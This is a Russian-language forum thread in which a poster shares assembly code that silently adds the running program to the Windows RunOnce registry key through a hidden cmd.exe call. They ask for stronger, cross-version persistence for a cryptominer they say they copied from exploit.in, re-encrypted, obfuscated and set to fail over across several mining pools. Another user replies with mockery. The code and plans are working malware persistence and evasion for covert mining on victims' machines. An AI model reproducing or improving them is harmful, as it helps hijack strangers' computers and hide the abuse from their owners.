Есть код. Код (Text): proc SetAutorun pushad jmp ..DoAutorun StrCorrectFormat du '/c REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce" /V "%s" /t REG_SZ /F /D "%s"',0,0 ValueName du 'AAAAA',0,0 hKey dd 1 open du 'open',0,0 supcmd du 'cmd.exe',0,0 ..DoAutorun: invoke GetProcessHeap invoke HeapAlloc, eax, 0, 1024 *2 + 4 mov esi, eax mov edi, esi add edi, 1024 invoke GetModuleFileNameW, 0, esi, 512 lea ebx, [ValueName] invoke wsprintfW, edi, StrCorrectFormat, ebx, esi add esp, 16 invoke ShellExecuteW, 0, open, supcmd, edi, 0, SW_HIDE .RegErr: invoke GetProcessHeap invoke HeapFree, eax, 0, esi .AllocErr: popad ret endp Помогите сделать более серьезный закреп в системе что бы работал на всех ос.
Да не, я об этом. Видел сорцы подобной штуки тут, узнал код https://forum.exploit.in/index.php?showtopic=134245
Почистил и перекриптовал encrypted.dat Убрал вообще загрузку dll с хоста, длл сделал пока что внутри , позже доделаю как единый ехе. Убрал лишнее и не много обсуцировал код. Изменил алгоритм нагрузки на процессор. Добавил поддержку для себя 5 и более пулов. Без админок. Если пул один перестаёт работать, или пул банит, майнится на другой. Ну и так по мелочи ещё.. А тут я написал так как хочу выбрать среднее зло для закрепа. Интересны лишь мысли людей. Что бы на рентайме спокойнее было.
> amagrupp: дайте инфект. > zerodawn: возьмите с эплойта(exploit.in) > amagrupp: остальное сделал.. > zerodawn: что остальное" ? > amagrupp: >> Вычищал, криптовал, изменял. Алгоритм нагрузки на CPU. Без админок но с пулами. Пул банит или майнится. Остальное всё мелочи. >> "Интересны лишь мысли людей. Что бы на рентайме спокойнее было." ~~~ К наркологу пациента! Обычно нарколог совмещает специальность психиатра. Тоесть данный доктор решает обе проблемы. Обеим туда прямой путь.
